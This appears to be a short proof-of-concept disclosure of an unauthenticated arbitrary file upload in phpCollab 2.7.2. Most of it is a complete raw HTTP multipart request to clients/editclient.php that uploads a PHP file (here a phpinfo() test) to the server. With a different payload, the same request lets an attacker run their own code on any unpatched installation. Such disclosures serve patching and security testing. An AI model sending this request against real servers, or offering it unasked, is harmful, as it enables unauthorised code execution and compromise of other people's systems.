#/
#* phpCollab 2.7.2 - Arbitrary File Upload
#* Author : Trung Le
#* Tutorial Video : https://www.youtube.com/watch?v=zHuJkoQe4Tc
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#* Blog: baomatcoban.info
#/
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
Request:
----------
POST /phpcol/clients/editclient.php?action=add& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------42876024093685464851592998730
Content-Length: 1280
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/phpcol/clients/editclient.php?&
Upgrade-Insecure-Requests: 1
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000000
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="owner"
1
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="name"
Process 2.7
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="address"
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="phone"
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="url"
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="email"
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="comments"
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="hourly_rate"
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="upload"; filename="index.php"
Content-Type: application/octet-stream
<?php
phpinfo();
-----------------------------42876024093685464851592998730--
----------